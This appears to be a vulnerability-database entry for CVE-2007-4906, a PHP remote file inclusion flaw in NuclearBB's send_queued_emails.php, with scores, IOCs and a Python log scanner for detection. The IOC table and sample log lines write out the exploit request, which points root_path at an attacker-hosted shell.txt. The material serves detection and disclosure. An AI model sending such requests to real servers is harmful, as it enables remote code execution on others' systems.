CVE-2007-4906
published 2007-09-17


Priority: P3 (44)
Severity: medium, CVSS 2.0 base score 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 38.38% (98.4th percentile)
PHP remote file inclusion vulnerability in tasks/send_queued_emails.php in NuclearBB Alpha 2, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter.

Affected (1 range)

Vendor      Product     Version range   Fixed in
nuclearbb   nuclearbb

Detection & IOCs (extracted from sources)

Type      Value
path      /NuclearBB/tasks/send_queued_emails.php
url       http://localhost/NuclearBB/tasks/send_queued_emails.php?root_path=http://localhost/shell.txt?
command   root_path=http://[attacker]/shell.txt?
  • Monitor HTTP GET requests to send_queued_emails.php containing a URL (http:// or https://) in the root_path parameter, which indicates an RFI exploitation attempt.
  • The trailing '?' appended to the injected URL (e.g., shell.txt?) is a classic RFI technique to nullify the appended local path string; detect this pattern in query strings targeting root_path.
  • The vulnerable code path is line 14 of send_queued_emails.php: require("$root_path/inc/functions_email.php"); — any unsanitised URL value in root_path will be remotely included.
  • Exploitation requires register_globals to be enabled on the target server; correlate findings with server configuration checks for register_globals=On.
  • This vulnerability is only exploitable when PHP's register_globals directive is enabled (On). Servers with register_globals=Off are not affected.
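Detection logic for the first two bullets above, as an added example that is not part of this CVE record or of NuclearBB: it parses constructed access-log lines (the addresses are made up) and flags requests to send_queued_emails.php whose root_path value begins with a URL scheme, noting whether the trailing '?' pattern is present.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); source and
# payload-host addresses are documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Sep/2007:10:01:02 +0000] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://198.51.100.9/shell.txt? HTTP/1.1" 200 512
198.51.100.4 - - [17/Sep/2007:10:02:15 +0000] "GET /NuclearBB/tasks/send_queued_emails.php HTTP/1.1" 200 128
192.0.2.33 - - [17/Sep/2007:10:03:44 +0000] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=https%3A%2F%2F198.51.100.9%2Fshell.txt HTTP/1.1" 200 512
192.0.2.10 - - [17/Sep/2007:10:04:01 +0000] "GET /NuclearBB/index.php?root_path=../inc HTTP/1.1" 200 2048
"""

# Source address, request target and status code from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A root_path value that starts with a remote scheme is an RFI indicator.
REMOTE_SCHEME_RE = re.compile(r'^\s*(https?|ftps?)://', re.IGNORECASE)


def inspect_request(target):
    """Return a finding dict if the request carries a remote URL in root_path, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/send_queued_emails.php"):
        return None
    # parse_qs percent-decodes values, so encoded payloads are caught as well;
    # a second unquote() also exposes double-encoded values.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("root_path", []):
        value = unquote(value)
        if REMOTE_SCHEME_RE.match(value):
            return {
                "path": parts.path,
                "root_path": value,
                # Trailing '?' turns the appended "/inc/functions_email.php" into a query string.
                "trailing_qmark": value.endswith("?"),
            }
    return None


def scan_log(text):
    """Return (source address, status, finding) for each line matching the RFI pattern."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        finding = inspect_request(m.group("target"))
        if finding:
            findings.append((m.group("src"), int(m.group("status")), finding))
    return findings
```

A 200 status on a flagged request means the include was attempted server-side, so those lines warrant checking the host's register_globals setting and its PHP error log.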